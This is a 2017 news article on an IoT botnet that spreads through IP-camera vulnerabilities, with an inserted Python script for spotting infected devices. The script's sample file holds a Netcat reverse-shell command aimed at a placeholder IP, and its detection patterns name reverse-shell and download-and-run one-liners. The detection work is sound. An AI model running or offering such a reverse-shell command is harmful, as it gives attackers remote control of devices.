New Botnet Continues to Grow

Monday, October 23, 2017 @ 11:10 AM gHale

A new botnet is on the hunt for weakly secured Internet of Things (IoT) devices, researchers said.

To date, one million organizations appear to have been hit by the botnet, which first became visible in late September, said researchers at Check Point.


At first the malware goes after vulnerabilities commonly found in various IP camera models. Targeted vendors include GoAhead, D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, and Synology.

“So far we estimate over a million organizations have already been affected worldwide, including the U.S., Australia and everywhere in between, and the number is only increasing,” Check Point researchers said in a post.

“The discovery of a botnet bigger and potentially more dangerous than Mirai is alarming news for businesses and consumers around the globe,” said Mark Hearn, director of IoT Security at Irdeto. “This discovery again shows the security weaknesses in IoT devices that can be harnessed by attackers for potentially devastating effects.”

“Creating networks of infected devices is not a quick task for an attacker,” Check Point researchers said. “In order to establish an effective Botnet, the attacker needs to be able to control a vast number of devices. As sending the malicious code to each device individually would be a large and time consuming task, it is much easier to have each infected device spreading the malicious code to other similar devices themselves. This method of attack is considered a propagation attack, and is essential in quickly creating a large network of controlled devices.”

On an infected device, Check Point researchers said, the attackers read the System.ini file to check whether the device has already been compromised. Normally that file contains the user's credentials; on the hacked device it instead contained a ‘Netcat’ command that opens a reverse shell to the attacker's IP address.

The researchers therefore concluded that the machine, a GoAhead device compromised through the CVE-2017-8225 vulnerability, was spreading the infection after being infected itself.
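The compromise check described above, turned into triage logic, as an added example that is not part of the Check Point report or this article: given the contents of a camera's System.ini (copied off the device by an administrator), flag any line that looks like a Netcat or similar reverse-shell one-liner and pull out the callback IP. The two file contents and the device names are constructed for the example; the reverse-shell patterns are generic indicators, not signatures taken from the report.

```python
import re

# Constructed sample contents, not real captures. On these cameras System.ini is
# described as holding the user's credentials; the infected one instead held a
# Netcat command that opens a reverse shell to the attacker's IP.
CLEAN_SYSTEM_INI = "admin\nadmin_password\n"
INFECTED_SYSTEM_INI = "nc 203.0.113.10 4444 -e /bin/sh\n"

# Generic reverse-shell / download-and-run indicators (assumed patterns, not from
# the report). Note: '\b' does not sit between a space and '-' or '/', so those
# tokens are anchored with '\s' instead of '\b'.
REVERSE_SHELL_PATTERNS = [
    # nc/ncat/netcat ... -e /bin/sh
    re.compile(r"\b(?:nc|ncat|netcat)\b[^\n]*\s-e\s[^\n]*/bin/(?:ba)?sh\b"),
    # nc ... | /bin/sh  (pipe-based variant when -e is compiled out)
    re.compile(r"\b(?:nc|ncat|netcat)\b[^\n]*\|[^\n]*/bin/(?:ba)?sh\b"),
    # bash /dev/tcp/<ip>/<port> redirection shells
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    # interactive bash, typical of "bash -i >& /dev/tcp/..." one-liners
    re.compile(r"\bbash\s+-i\b"),
    # fetch a payload and pipe it straight into a shell
    re.compile(r"\b(?:wget|curl|tftp)\b[^\n]*\|\s*(?:sh|bash)\b"),
]

IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def find_reverse_shell(ini_text):
    """Scan System.ini contents line by line.

    Returns a list of (line_number, line, callback_ip) for every line that
    matches a reverse-shell indicator; callback_ip is None if no IPv4 address
    appears on that line. An empty list means nothing suspicious was found.
    """
    findings = []
    for line_no, line in enumerate(ini_text.splitlines(), start=1):
        if any(p.search(line) for p in REVERSE_SHELL_PATTERNS):
            ip = IPV4.search(line)
            findings.append((line_no, line.strip(), ip.group(0) if ip else None))
    return findings


def triage(device_files):
    """device_files maps a device name to its System.ini contents.

    Returns the sorted names of devices whose file carries a reverse-shell
    command, i.e. the ones to isolate first.
    """
    return sorted(name for name, text in device_files.items()
                  if find_reverse_shell(text))


if __name__ == "__main__":
    # Device names are constructed for the example.
    fleet = {"cam-lobby": CLEAN_SYSTEM_INI, "cam-loading-dock": INFECTED_SYSTEM_INI}
    for name in triage(fleet):
        for line_no, line, ip in find_reverse_shell(fleet[name]):
            print(f"{name}: line {line_no} -> {line!r} (callback {ip})")
```

A device whose System.ini no longer holds credentials but holds a command is already a strong signal on its own; the callback IP is what you take to the firewall and the rest of the fleet, since the report notes that compromised devices both receive and spread the infection.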

“Upon further research, it was found that numerous devices were both being targeted and later sending out the infection. These attacks were coming from many different types of devices and many different countries, totaling approximately 60 percent of the corporate networks which are part of the ThreatCloud global network,” Check Point researchers said.

The security researchers said the people behind this threat might be getting ready for massive, global attacks, possibly distributed denial of service (DDoS).

“The increased connectivity of IoT devices and ecosystems, brings a much greater security risk that is being exposed time and time again,” Hearn said. “However, while organizations recognize the importance of this connectivity to meet consumer demand and maintain a competitive edge, today’s connected world also assists in how botnets like this spread. With the cross-contamination of connected devices, threats easily cross boundaries of the connected home, the connected building, mobile devices and the enterprise. Gone are the days where protecting devices inside corporate walls is enough. As a result, security strategists need to think differently, factoring in the full IoT threat landscape and thinking like a hacker.”

To combat these threats, Hearn added, organizations should implement a multi-layered cybersecurity strategy that disrupts a hacker’s business model, making it difficult to reverse engineer or tamper with software and exploit vulnerabilities introduced through connected devices.
